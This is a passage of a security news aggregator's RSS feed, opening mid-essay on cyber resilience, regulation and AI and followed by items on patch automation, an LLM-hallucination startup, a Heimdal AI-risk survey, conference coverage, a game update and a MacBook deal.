

<h2 class="wp-block-heading">The critical question</h2>



<p>In Europe, under the EU legislative umbrella, cyber resilience is becoming explicit regulatory language. <a href="https://www.csoonline.com/article/570091/eus-dora-regulation-explained-new-risk-management-requirements-for-financial-firms.html">DORA</a> makes digital operational resilience a serious financial-sector obligation. <a href="https://www.csoonline.com/article/3568787/eus-nis2-directive-for-cybersecurity-resilience-enters-full-enforcement.html">NIS2</a> widens the net around essential and important entities. The <a href="https://www.csoonline.com/article/4168696/eus-cyber-resiliency-act-will-put-it-leaders-to-the-test.html">Cyber Resilience Act</a> pushes security into the lifecycle of products with digital elements, from planning and design to development and maintenance. Europe, in its very European way, is saying: You shall be resilient, and <a href="https://www.csoonline.com/article/4108294/implementing-nis2-without-ending-up-in-a-paper-war.html">there shall be paperwork</a>.</p>



<p>The US is taking a different, perhaps more laissez-faire path. It is pushing accountability through disclosure, enforcement, sector rules, procurement pressure, and public-private nudging. The SEC wants material cyber risk and incidents visible to investors. CIRCIA aims to force critical infrastructure operators to report substantial incidents and ransom payments. CISA pushes <a href="https://www.csoonline.com/article/3971375/secure-by-design-is-likely-dead-at-cisa-will-the-private-sector-make-good-on-its-pledge.html">Secure by Design pledges</a>. All that sounds good. But there is a catch, and it lies in the unresolved question of criticality.</p>



<p>Critical for whom?</p>



<p>Critical for the government? For consumers? For markets? For the company’s customers? Critical for a supply chain that no regulator has fully mapped because the economy now runs on a cesspool of unmanaged SaaS dependencies?</p>



<p>Europe is increasingly trying to define resilience as an obligation. The US, more characteristically, is trying to produce accountability through disclosure, enforcement, procurement pressure, and market signaling. The problem is that market signaling collapses when nobody wants to admit they are part of the market’s critical nervous system. This is where the comfortable policy language starts to wobble.</p>



<p>“Critical infrastructure” is treated as if it were a natural category. It is not natural. It is political, legal, economic, operational, and worst of all, highly fluid. Companies are trying to avoid being seen as critical when the label brings obligations, reporting duties, scrutiny, liability, and expense. That is not cynicism. That is incentives doing what incentives do: rewarding ambiguity, punishing transparency, and giving everyone a reason to stay conveniently uncritical until the blast radius proves otherwise.</p>



<p>The deeper issue is not only critical infrastructure. It is critical dependency.</p>



<p>A company may not be critical to the state, but it may be critical to every customer that relies on it. A vendor may avoid the regulatory label, but not the blast radius. A minor-looking SaaS provider, identity layer, CI/CD platform, payment processor, LLM tool, MSP, open-source package, or API gateway can become the point where hundreds of organizations discover that their <a href="https://www.csoonline.com/article/515730/business-continuity-and-disaster-recovery-planning-the-basics.html">business continuity plan</a> was a PDF bundled in mindless optimism.</p>



<p>This is why voluntary pledges are useful but insufficient. They create norms and language. They help responsible companies signal intent. But a pledge is not a control. A pledge without evidence, enforcement, procurement consequences, customer pressure, or liability is policy theater with potential. Better than silence, yes. Better than mandatory resilience? Not even close.</p>



<p>And then AI permeates the world as an accelerant poured across the entire problem.</p>



<h2 class="wp-block-heading">The AI uprising</h2>



<p>AI compresses time. It <a href="https://www.csoonline.com/article/4014238/cybercriminals-take-malicious-ai-to-the-next-level.html">lowers attacker skill barriers</a>. It improves phishing, reconnaissance, exploit development, malware support, impersonation, fraud, and social engineering. It also expands the attack surface inside companies through <a href="https://www.csoonline.com/article/4143302/the-cisos-guide-to-responding-to-shadow-ai.html">shadow AI</a>, <a href="https://www.csoonline.com/article/4047974/agentic-ai-a-cisos-security-nightmare-in-the-making.html">AI agents</a>, sensitive data leakage, automated decisions, insecure integrations, and systems that can act <a href="https://www.csoonline.com/article/4109999/agentic-ai-already-hinting-at-cybersecuritys-pending-identity-crisis.html">without anyone fully understanding how far their permissions reach</a>.</p>



<p>The uncomfortable part is that defenders need AI, too. Nobody is going to manually out-click, out-triage, and out-correlate machine-speed attacks with heroic analysts and vibes. Defensive AI is necessary. AI-assisted testing is necessary. <a href="https://www.csoonline.com/article/4145127/runtime-the-new-frontier-of-ai-agent-security.html">Runtime analysis is becoming more important</a>. <a href="https://www.csoonline.com/article/4064158/agentic-ai-in-it-security-where-expectations-meet-reality.html">Agentic security workflows will grow</a>. Humans matter, of course, but they will need to move from being button-pushers to decision-makers, validators, and designers of boundaries.</p>



<p>Recent Mythos revelation, whatever one thinks of it, <a href="https://www.csoonline.com/article/4158117/anthropics-mythos-signals-a-structural-cybersecurity-shift.html">exposed the broader truth</a>: AI is not merely another asset to secure. It changes the tempo of security. It changes what “timely” means. If attackers can move from discovery to exploitation faster than a company can schedule a change committee meeting, prevention-first chest-thumping becomes blind, brainless bravado.</p>



<p>Consequently, that is also where application security becomes central, but not in the narrow old sense.</p>



<h2 class="wp-block-heading">AppSec shows the way</h2>



<p>AppSec has traditionally been treated as prevention: find bugs, fix bugs, block exploit paths, test before release, scan the API, harden the app, stop the vulnerability from becoming an incident. That is still true. But modern AppSec is also resilience. Secure-by-design systems fail less catastrophically. Well-tested applications reduce blast radius. Strong API authorization protects business logic when identity is abused. Good software supply-chain controls make recovery possible because you know what you shipped, where it came from, and whether you can trust it. Continuous testing shortens the time between exposure and correction. Runtime visibility tells you what is actually happening, not what the architecture diagram claimed would happen in calmer weather.</p>



<p>The mature AppSec question is no longer only whether a vulnerability exists. It is how quickly the organization can discover exposure, validate exploitability, prioritize business impact, reduce blast radius, and prove the fix actually reduced risk.</p>



<p>So AppSec is preventive in method, but resilient in strategic value.</p>



<p>That matters because the old budget logic still lingers. Many organizations talk about resilience at the board level while still spending and operating like the real work is another tool, another dashboard, another rule, another exception queue, another heroic security team tuning SIEM alerts at midnight. There is a widening gap between the talk and the walk. The talk says resilience. The walk still mainly says prevention, compliance, and hope.</p>



<h2 class="wp-block-heading">Resilience becomes duty</h2>



<p>This is not to mock prevention. Prevention is valuable. It reduces noise and buys time. It blocks commodity attacks. Prevention keeps the easy doors closed and the lazy criminals moving. Good. Keep it. Fund it. Improve it.</p>



<p>But stop pretending it is the whole castle.</p>



<p>At some point, reinforcing the gate drains us of good iron. Or cash, as may be the case. The cannon is already here. Sometimes the cannon is ransomware. Sometimes it is a supplier compromise. Sometimes it is an AI-assisted vulnerability chain. Sometimes it is a cloud identity failure. Sometimes it is a security vendor update that helpfully demonstrates the concept of systemic risk by taking half the planet down before breakfast.</p>



<p>The organizations that survive will not be the ones with the prettiest walls. They will be the ones that know what happens when the walls fail.</p>



<p>They will know which services matter most. They will know their dependencies, how to isolate blast radius, how to restore from clean sources. They will know who decides, who communicates, who pays, who informs regulators, who speaks to customers, and who has authority to shut something down before the whole environment becomes a crime scene with invoices.</p>



<p>They will practice. Not once a year in a tabletop exercise where <a href="https://www.csoonline.com/article/4179644/7-tabletop-exercise-mistakes-that-sabotage-incident-response.html">everyone nods politely</a> and pretends Legal will respond in real-time. They will practice seriously. They will break assumptions. They will test recovery. They will challenge vendors. They will treat incident response as an organizational muscle, not a binder.</p>



<p>This is also where <a href="https://www.csoonline.com/article/3602722/the-ciso-paradox-with-great-responsibility-comes-little-or-no-power.html">CISO accountability must be discussed honestly</a>. It is easy to demand accountability from the security leader after the fire. It is harder to ask whether the CISO had budget, authority, board access, engineering influence, product leverage, procurement power, and documented risk acceptance before the fire. If a company wants the CISO to be accountable for survival, then the <a href="https://www.csoonline.com/article/3617367/dear-ceo-an-open-letter-from-your-ciso.html">CISO must be empowered to design for survival</a>. Otherwise, accountability is just corporate theater, and the CISO is one person selected in advance to <a href="https://www.csoonline.com/article/3631759/personal-liability-sours-70-of-cisos-on-their-role.html">stand under the falling chandelier</a>.</p>



<p>The same applies to boards. A board that funds only prevention but expects resilience after failure is not governing cyber risk. It is buying a bucketload of denial. Cybersecurity cannot remain a narrow technical department expected to compensate for fragile business architecture, reckless supplier dependence, poor software practices, underfunded recovery, unclear executive authority, and magical thinking about AI.</p>



<p>If cybersecurity is survival, then everyone who shapes organizational resilience shapes cybersecurity. Engineering shapes it. Procurement shapes it. Legal shapes it. Finance, Product, HR, Communications — they all shape it. The board, too, and the CEO. Security may lead the discipline, but it cannot be the only organ responsible for keeping the body alive.</p>



<p>That is the point. Not that prevention no longer matters. Not that we should abandon controls and have minstrels sing of resilience while attackers empty the database. The point is that protection is no longer enough to <em>define security</em>. A company that collapses when prevention fails was never truly secure. It was only protected until the first failure.</p>



<p>The cybersecurity paradigm of today and tomorrow must be built around survival: surviving breach, surviving disruption, surviving AI acceleration, surviving dependency failure, surviving regulatory scrutiny, and surviving the moment when the neat diagram meets the ugly incident.</p>



<p>We still need walls, gates, and guards.</p>



<p>But the wall is not the city, nor its citizens. And if the city and the citizens cannot survive after the wall falls, then maybe the wall was never a viable strategy.</p>



<p>Maybe it was just a waste of that good iron.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[3 Tips for surviving the patch apocalypse]]></title>
<description><![CDATA[More than 45,000 common vulnerabilities and exposures (CVEs) were published in 2025. That number alone makes manual patching not just impractical, but obsolete. Now, add emerging AI models capable of discovering severe zero-day threats across major operating systems at unprecedented speed, and th...]]></description>
<link>https://tsecurity.de/de/3615902/it-nachrichten/3-tips-for-surviving-the-patch-apocalypse/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3615902/it-nachrichten/3-tips-for-surviving-the-patch-apocalypse/</guid>
<pubDate>Mon, 22 Jun 2026 17:18:26 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>More than 45,000 common vulnerabilities and exposures (CVEs) were published in 2025. That number alone makes manual patching not just impractical, but obsolete. Now, add emerging AI models capable of discovering severe zero-day threats across major operating systems at unprecedented speed, and the window between vulnerability disclosure and active exploitation has shrunk from weeks to hours.</p>



<p>“The organizations that survive the patch apocalypse won’t be the ones that patch the most; they’ll be the ones that patch the smartest,” says Sydney Lesser, senior product marketing manager at Ivanti. “That requires a fundamental shift in how security teams think about prioritization, automation, and the relationship between security and the people it’s meant to protect.”</p>



<p>Lesser explores this new threat landscape in depth in the white paper, <a href="https://www.ivanti.com/resources/whitepapers/the-patch-apocalypse?utm_source=foundry&amp;utm_medium=hosted-content&amp;utm_campaign=2026-global-Q2Q3TL-foundry-brandpost&amp;utm_content=patch-whitepaper&amp;elqCampaignId=6504" rel="sponsored">The Patch Apocalypse</a>. But for now, here are three steps every organization should take.</p>



<h3 class="wp-block-heading"><strong>1. Prioritize risk, not volume</strong></h3>



<p>The patch surge is structural and permanent. Security teams must accept that they cannot patch everything to solve the problem. The organizations winning this fight will focus their remediation effort on the threats that matter most, not just the ones that score highest on a CVE list.</p>



<p>That means going beyond raw Common Vulnerability Scoring System (CVSS) scores. Ivanti’s Vulnerability Risk Rating (VRR) correlates vulnerability severity, active exploit intelligence, and real-world threat context to surface what actually needs to be fixed first, giving security teams a more actionable guide than severity scores alone provide.</p>



<p>Prioritization also means getting the timing right. Patch too slowly, and you accumulate service level agreement (SLA) risk, leaving critical systems exposed while the clock ticks. Patch too aggressively and you risk destabilizing environments, driving up downtime, and burning out the teams responsible for managing the fallout. The goal is a deliberate cadence, fast enough to close critical gaps before they are exploited, but controlled enough to avoid creating new operational problems in the process.</p>



<h3 class="wp-block-heading"><strong>2. Automate patch deployment</strong></h3>



<p>The traditional patching process follows a familiar and broken pattern:  A vulnerability is disclosed, a ticket is opened, approvals are routed, and deployment is scheduled weeks later. By the time the fix reaches production, attackers have long since moved in.</p>



<p>Humans cannot operate at the machine speed of attackers. Breaking that cycle means shifting from a human-coordinated process to an autonomous one where the system continuously monitors for vulnerabilities, evaluates them against your risk priorities, and deploys remediation automatically, without waiting for someone to notice, approve, and act.</p>



<p>Autonomous patch management (APM), within the broader category of autonomous endpoint management (AEM), makes that shift possible. It doesn’t just speed up the old process; it replaces it entirely.  Instead of relying on monthly cycles, APM keeps pace with the threat landscape in real time, staging rollouts through ring deployment and validating stability at each phase before proceeding, so a bad patch doesn’t become a company-wide incident. Security teams set the policies and guardrails; the platform executes. The result is an organization that responds to threats in hours, not weeks.</p>



<h3 class="wp-block-heading"><strong>3. Balance security with the user experience</strong></h3>



<p>The ultimate goal is not to simply patch as many CVEs as possible, but to protect critical systems while still enabling users to do their jobs. Sustainable security should be invisible, frictionless, and continuous.  </p>



<p>The cost of getting that balance wrong is measurable. Office workers average 2.7 security update disruptions per month—at a 2,000-employee company; that adds up to nearly $4 million in lost productivity annually, according to Ivanti’s Digital Employee Experience (DEX) Report. Too often, tech disruptions from security updates drain employee productivity.  Those costs can be even greater when patching interrupts high-value tasks like the creation of a C-level presentation.  </p>



<p>“Security and productivity have been treated as opposing forces for too long,” says Lesser. “The technology exists today to make patching something employees never think about, and that should be the bar every IT and security team holds itself to.”</p>



<p>Modern autonomous patch management platforms deploy patches during off-hours, idle states, or defined maintenance windows, maintaining a perpetually shrinking exposure window without disrupting the people it protects. Continuous compliance enforcement means audit readiness is always-on, not a last-minute scramble. When security becomes invisible, it becomes sustainable.</p>



<p>The patch apocalypse isn’t coming; it’s here. <a href="https://www.ivanti.com/use-cases/the-patch-apocalypse-is-here?utm_source=foundry&amp;utm_medium=hosted-content&amp;utm_campaign=2026-global-Q2Q3TL-foundry-brandpost&amp;utm_content=patch-apocalypse&amp;elqCampaignId=6504" rel="sponsored">See how Ivanti</a> helps organizations stay ahead of it. </p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Tech Pundit Cringely Co-Founds Startup '2Brains Inc' to Solve LLM Hallucinations]]></title>
<description><![CDATA[Long-time tech pundit Robert Cringely started his career at the Stanford Artificial Intelligence Lab back in 1978. Last month 73-year-old Cringely explained why his site went on a two-year hiatus — and it's not just because of a heart attack and a stroke last July:


Just like everyone else, I've...]]></description>
<link>https://tsecurity.de/de/3612700/it-security-nachrichten/tech-pundit-cringely-co-founds-startup-2brains-inc-to-solve-llm-hallucinations/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3612700/it-security-nachrichten/tech-pundit-cringely-co-founds-startup-2brains-inc-to-solve-llm-hallucinations/</guid>
<pubDate>Sat, 20 Jun 2026 21:52:31 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Long-time tech pundit Robert Cringely started his career at the Stanford Artificial Intelligence Lab back in 1978. Last month 73-year-old Cringely explained why his site went on a two-year hiatus — and it's not just because of a heart attack and a stroke last July:


Just like everyone else, I've been busy all this time on Artificial Intelligence, founding with two partners a company called 2Brains... The work we were doing together is unfinished, but it's not stopped. The patents are filed, the architecture is documented, and the small team continuing the work includes me. 

Cringely's first piece made the cast that "the trillion-dollar bet the AI industry is making right now may be wrong, and that there's an architectural alternative we've patented and built."




In Machines of Loving Grace, Amodei made the case that scaling compute would eventually solve essentially every hard problem in artificial intelligence. Buried in that optimism — or maybe not buried, maybe right out in the open — was a quiet absolution. Hallucinations, the embarrassing tendency of these systems to state falsehoods with total confidence, would take care of themselves. Make the models big enough, train them long enough, and the problem dissolves. You don't have to solve it. You just have to wait, and spend. And so the entire AI industry breathed a sigh of relief. 

I have spent forty years watching this industry, and I know a permission slip when I see one. 

Because that is what the essay became, whatever Amodei intended. It gave every other person writing nine- and ten-figure checks a reason not to worry about the one thing that should worry them most. The hallucination problem is the difference between a clever toy and a system a hospital or a bank or a court can actually rely on. It is the whole ballgame for enterprise AI. And the prevailing wisdom, blessed from the top, is that you needn't address it directly. Scale will provide... 

A small company I helped start, 2Brains Inc., set out in 2022 to solve hallucinations — before ChatGPT, before the scaling consensus hardened into received truth, back when the polite assumption was that the problem was simply insurmountable. We did not solve it by waiting for bigger models. We solved it architecturally, by separating the part of the system that generates language from the part that retrieves and verifies facts, and reconciling the two before anything reaches the user. It runs on ordinary processors. It is cheap. And on the industry's own benchmark for this kind of faithfulness, it more than doubles the published baseline, with no fabricated facts in the verified case at all. 

The article asks whether scaling will, at tremendous cost, eventually reduce hallucinations — or even worse, if the largest companies in the world "are spending a fortune chasing a cure that is not coming." 

And last week Cringely pitched more advantages for their solution, noting that most prompts aren't even chatbot-level creative prompts — but just requests to retrieve simple data:

The reason 2Brains doesn't lie and the reason it's cheap are the same reason. It looks the fact up instead of guessing it — so it cannot fabricate, and the lookup runs on a processor that sips power instead of a chip that gulps it. Trust and thrift are not a trade-off you balance against each other. They fall out of a single design decision. You do not pay extra for the honest version. The honest version is the cheap version. That sentence is the whole company.
<p></p><div class="share_submission">
<a class="slashpop" href="http://twitter.com/home?status=Tech+Pundit+Cringely+Co-Founds+Startup+'2Brains+Inc'+to+Solve+LLM+Hallucinations%3A+https%3A%2F%2Fslashdot.org%2Fstory%2F26%2F06%2F20%2F0556251%2F%3Futm_source%3Dtwitter%26utm_medium%3Dtwitter"><img src="https://a.fsdn.com/sd/twitter_icon_large.png"></a>
<a class="slashpop" href="http://www.facebook.com/sharer.php?u=https%3A%2F%2Fslashdot.org%2Fstory%2F26%2F06%2F20%2F0556251%2Ftech-pundit-cringely-co-founds-startup-2brains-inc-to-solve-llm-hallucinations%3Futm_source%3Dslashdot%26utm_medium%3Dfacebook"><img src="https://a.fsdn.com/sd/facebook_icon_large.png"></a>



</div><p><a href="https://slashdot.org/story/26/06/20/0556251/tech-pundit-cringely-co-founds-startup-2brains-inc-to-solve-llm-hallucinations?utm_source=rss1.0moreanon&amp;utm_medium=feed">Read more of this story</a> at Slashdot.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[World of Warcraft: Midnight's second season has been announced, and it's bringing a ton of snake-infested Raids, Dungeons, and Delves to fight]]></title>
<description><![CDATA[Blizzard has just unveiled the next big content update for World of Warcraft: Midnight, called the "Curse of Ula’tek", which will feature the expansion's second season of new Raids, Dungeons, Delves, and more.]]></description>
<link>https://tsecurity.de/de/3610407/windows-tipps/world-of-warcraft-midnights-second-season-has-been-announced-and-its-bringing-a-ton-of-snake-infested-raids-dungeons-and-delves-to-fight/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3610407/windows-tipps/world-of-warcraft-midnights-second-season-has-been-announced-and-its-bringing-a-ton-of-snake-infested-raids-dungeons-and-delves-to-fight/</guid>
<pubDate>Fri, 19 Jun 2026 14:54:51 +0200</pubDate>
<category>🪟 Windows Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Blizzard has just unveiled the next big content update for World of Warcraft: Midnight, called the "Curse of Ula’tek", which will feature the expansion's second season of new Raids, Dungeons, Delves, and more.]]></content:encoded>
</item>
<item>
<title><![CDATA[Heimdal Survey: Executives Four Times More Confident About AI Risk Than the Teams Managing It]]></title>
<description><![CDATA[New research from cybersecurity company Heimdal finds 29% of US executives say AI risk is under control, against 7% of the practitioners running it day-to-day. Across 1,000 IT professionals in the UK and US, AI adoption has outpaced security controls by roughly two to one.



Heimdal today publis...]]></description>
<link>https://tsecurity.de/de/3604805/it-nachrichten/heimdal-survey-executives-four-times-more-confident-about-ai-risk-than-the-teams-managing-it/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3604805/it-nachrichten/heimdal-survey-executives-four-times-more-confident-about-ai-risk-than-the-teams-managing-it/</guid>
<pubDate>Wed, 17 Jun 2026 14:47:57 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p><strong>New research from cybersecurity company Heimdal finds 29% of US executives say AI risk is under control, against 7% of the practitioners running it day-to-day. Across 1,000 IT professionals in the UK and US, AI adoption has outpaced security controls by roughly two to one.</strong></p>



<p><a href="https://heimdalsecurity.com/" target="_blank" rel="sponsored">Heimdal</a> today published <a href="https://heimdalsecurity.com/blog/state-ai-risk-management/?utm_source=cybernewswire&amp;utm_medium=pr&amp;utm_campaign=ai-risk-report-2026&amp;utm_content=report" target="_blank" rel="sponsored">The State of AI Risk Management in 2026</a>, a survey of 1,000 IT professionals across the United Kingdom and the United States.</p>



<p>The report’s headline finding is a divide inside the same organizations: the closer a person sits to the day-to-day running of AI, the less confident they are that the risk is contained. In the US, 29% of C-suite and VP respondents say their organization has AI risk under control, against 7% of the mid-level practitioners managing it.</p>



<p>In the UK, the gap runs the same way, 18% to 11%. Both gaps are statistically significant.</p>



<p>AI tools are already present across most IT estates, and most teams run several at once.</p>



<p>The controls have not kept pace. Across both markets, the report finds adoption has outrun security controls by roughly two to one.</p>



<p>The survey also records a counterintuitive pattern: the teams that see their AI use most clearly are the most concerned about it, not the least.</p>



<p>Heimdal’s report describes visibility as the diagnosis rather than the cure.</p>



<p>In an incident publicly disclosed in January 2026, the acting director of CISA, the United States cybersecurity agency, uploaded documents marked “For Official Use Only” to public ChatGPT in mid-2025.</p>



<p>The agency’s own monitoring flagged the activity within a week, but the use policy had not prevented it.</p>



<p>Key findings</p>



<ul class="wp-block-list">
<li>Executive confidence outruns the frontline. In the US, 29% of executives say AI risk is under control, against 7% of practitioners. In the UK, 18% against 11%.</li>



<li>AI is already embedded. ChatGPT runs in 72% of UK IT environments and 69% of US environments, and Microsoft Copilot in 68% of UK and 59% of US.</li>



<li>Readiness lags adoption. Only around 4 in 10 teams rate their security stack as ready for AI-related risk.</li>



<li>Concern rises with visibility. Among UK teams with full visibility into AI use, 56% flag data leakage as a top concern, against 27% of teams with none. In the US the figure is 59% among teams with full visibility.</li>



<li>Operational load is high. Nearly three-quarters of IT and security teams lose at least a quarter of their week to repetitive, low-value work, and around one in three lose more than half.</li>



<li>The most overloaded teams are the most optimistic about AI. 59% of the most overloaded US teams, and 55% in the UK, expect AI to ease the load.</li>
</ul>



<p>“Misplaced confidence is one of the most dangerous things in security. This data shows executives are far more confident that AI risk is under control than the evidence supports. Most of the conversation right now is about productivity, when the bigger question is how AI can be turned against the business. The report shows the gap between how secure leaders feel and how secure they actually are,” said Adam Pilton, Cybersecurity Advisor at Heimdal.Independent security researcher Rafay Baloch, CEO and Founder of REDSECLABS, added: “The risk that concerns me most is not AI itself but the blind spots it can create. When teams use AI tools without clear oversight, sensitive information, intellectual property, and business data can end up in places leaders never intended. Many organizations believe having an AI policy means they are prepared, but a policy alone does not create visibility. The companies seeing the best results are not the ones trying to restrict AI. They are the ones creating clear guardrails while helping employees use AI responsibly.”</p>



<p>The report concludes that organizations should treat AI as part of the core IT estate, applying the same scrutiny to AI services as to any other critical supplier, including procurement review, contractual data-handling terms, a current inventory of sanctioned and unsanctioned AI tools, and technical controls over access, execution, action chains, and privilege.</p>



<p>The full report is available at <a href="https://heimdalsecurity.com/blog/state-ai-risk-management/?utm_source=cybernewswire&amp;utm_medium=pr&amp;utm_campaign=ai-risk-report-2026&amp;utm_content=report" target="_blank" rel="sponsored">https://heimdalsecurity.com/blog/state-ai-risk-management/</a></p>



<p><strong>About the Research</strong></p>



<p><a href="https://heimdalsecurity.com/blog/state-ai-risk-management/?utm_source=cybernewswire&amp;utm_medium=pr&amp;utm_campaign=ai-risk-report-2026&amp;utm_content=report" target="_blank" rel="sponsored">The State of AI Risk Management in 2026</a> is based on a survey of 1,000 IT professionals (500 UK, 500 US), conducted via Pollfish from 1 to 8 May 2026. The sample spans six seniority tiers from entry-level through C-suite and VP.</p>



<p><strong>About Heimdal</strong></p>



<p><a href="https://heimdalsecurity.com/" rel="sponsored">Heimdal</a> is a global cybersecurity provider offering a unified security and compliance platform across endpoint, identity, email, network, and access security. More than 17,000 customers in over 40 countries use its 12-plus integrated products to prevent threats, detect breaches, and automate response.</p>



<h5 class="wp-block-heading"><strong>Contact</strong></h5>



<p><strong>Head of Content</strong></p>



<p><strong>Danny Mitchell</strong></p>



<p><strong>Heimdal</strong></p>



<p><strong>dmi@heimdalsecurity.com</strong></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[CyberRisk TV Live Coverage from Identiverse 2026]]></title>
<description><![CDATA[Author: Security Weekly - A CRA Resource - Bewertung: 0x - Views:10 CyberRisk TV is broadcasting live from Identiverse 2026 in Las Vegas!

Join us for exclusive interviews with identity, security, and technology leaders, actionable insights, and the latest thinking from practitioners shaping the ...]]></description>
<link>https://tsecurity.de/de/3602637/it-security-video/cyberrisk-tv-live-coverage-from-identiverse-2026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3602637/it-security-video/cyberrisk-tv-live-coverage-from-identiverse-2026/</guid>
<pubDate>Tue, 16 Jun 2026 19:02:39 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: Security Weekly - A CRA Resource - Bewertung: 0x - Views:10 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/-fjaOeskPEA?autoplay=1&origin=http://tsecurity.de" frameborder="0"></iframe></p><p>CyberRisk TV is broadcasting live from Identiverse 2026 in Las Vegas!<br />
<br />
Join us for exclusive interviews with identity, security, and technology leaders, actionable insights, and the latest thinking from practitioners shaping the future of digital identity at the industry's premier identity-focused event.<br />
<br />
Throughout the day, we'll explore agentic AI and identity, non-human identities, identity governance, authentication, fraud prevention, workforce and customer identity, emerging identity security challenges, and the strategies organizations are using to build trust in an increasingly AI-driven world.<br />
<br />
Schedule:<br />
9:30am-10:00am PT -  Identiverse Kickoff with Mike Shema<br />
10:00am-10:30am PT - The Human Authorized. The Agent Acted. Who's Accountable? with Howard Ting, CEO at Opal Security<br />
10:30am-11:00am PT - From Sales Engineer to Forward Deployed Engineer: The Rise of Hybrid Technical Roles with Jaime Lewis-Gross, Senior Vice President of Solutions Engineering at Saviynt<br />
11:00am-11:30am PT - Stop Identity Fraud: Modern Strategies for Insurance and Healthcare with Kim Brown, Vice President, Product Management at LexisNexis Risk Solutions<br />
11:30am-12:00pm PT - ​Governing Agentic AI in the Age of Non-Human Identities with Amit Masand, Founder and CEO at IDM Express<br />
12:00-12:30pm PT - Making Enterprise AI Agents Accountable with Amir Ofek, CEO and Co-Founder at Aizome<br />
1:30pm-2:00pm PT - The Next Evolution of Identity Security: Using AI to Reduce Cost, Improve Efficiency, and Strengthen Governance with Ajay Gupta, CEO at SDG Corporation<br />
2:00pm-2:30pm PT - Agentic AI Has an Identity Problem with Itamar Apelblat, CoFounder & CEO at Token Security<br />
2:30pm-3:00pm PT - Interview with Shashwat Sehgal, P0 Security<br />
3:00pm-3:30pm PT - The Three Identity Problem: Surviving Identity Security's Chaotic Era with John Pritchard, Chief Executive Officer at Radiant Login<br />
3:30pm-4:00pm PT - Everyone Wants an AI Assistant. Few Are Ready to Govern One with Cassie Christensen, Field CTO at Saviynt<br />
4:00pm-4:30pm PT - Identiverse Recap with Mike Shema<br />
<br />
Full Show Notes & Schedule: https://securityweekly.com/idv26-1<br />
<br />
Find all of our Identiverse 2026 coverage at https://www.securityweekly.com/idv<br />
<br />
#Cybersecurity #Identiverse #identitysecurity #Identiverse2026 #aisecurity<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Amazon slashes M5 MacBook Air with 24GB RAM, 1TB SSD to $1,329]]></title>
<description><![CDATA[Amazon has quietly issued steeper M5 MacBook Air price drops on high-end configurations with 24GB of RAM and 1TB of storage thanks to an early Prime Day coupon.Pick up Apple's upgraded M5 MacBook Air with an early Prime Day discount - Image credit: AppleAmazon's early Prime Day MacBook Air deals ...]]></description>
<link>https://tsecurity.de/de/3602443/ios-mac-os/amazon-slashes-m5-macbook-air-with-24gb-ram-1tb-ssd-to-1329/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3602443/ios-mac-os/amazon-slashes-m5-macbook-air-with-24gb-ram-1tb-ssd-to-1329/</guid>
<pubDate>Tue, 16 Jun 2026 17:55:06 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Amazon has quietly issued steeper M5 MacBook Air price drops on high-end configurations with 24GB of RAM and 1TB of storage thanks to an early <a href="https://appleinsider.com/deals/amazon-prime-day">Prime Day</a> coupon.<br><br><div><img src="https://photos5.appleinsider.com/gallery/67966-143286-m5-macbook-air-24gb-ram-deal-xl.jpg" alt="Open MacBook Air laptop in Midnight with abstract blue pattern on screen, overlaid by bold turquoise label reading M5 AIR 24GB RAM, set against a soft blue and yellow gradient background" height="720"><br><span>Pick up Apple's upgraded M5 MacBook Air with an early Prime Day discount - Image credit: Apple</span></div><br>Amazon's early Prime Day MacBook Air deals deliver <strong><a href="https://www.amazon.com/dp/B0GR11MSHY/?th=1&amp;tag=apinsiderdeals-20" rel="nofollow" target="_blank">$170 in stacked savings</a></strong> thanks to a $150 cash discount stacked with a $20 in-cart coupon for qualifying accounts (business accounts may see a single $170 discount in lieu of the $20 in-cart savings) on both <a href="https://www.amazon.com/dp/B0GR11MSHY/?th=1&amp;tag=apinsiderdeals-20" rel="nofollow" target="_blank">13-inch</a> and <a href="https://www.amazon.com/dp/B0GR1RWSMF/?th=1&amp;tag=apinsiderdeals-20" rel="nofollow" target="_blank">15-inch configurations</a>.<br><br><ul><li>Buy 13-inch MacBook Air M5 (24GB RAM, 1TB SSD) in Sky Blue: <a href="https://www.amazon.com/dp/B0GR11MSHY/?th=1&amp;tag=apinsiderdeals-20" rel="nofollow" target="_blank"><strong>$1,329 ($170 off)</strong></a></li><li>Buy 15" MacBook Air M5 (24GB RAM, 1TB SSD) in Midnight: <a href="https://www.amazon.com/dp/B0GR1RWSMF/?th=1&amp;tag=apinsiderdeals-20" rel="nofollow" target="_blank"><strong>$1,529 ($170 off)</strong></a></li></ul><br><br><br> <a 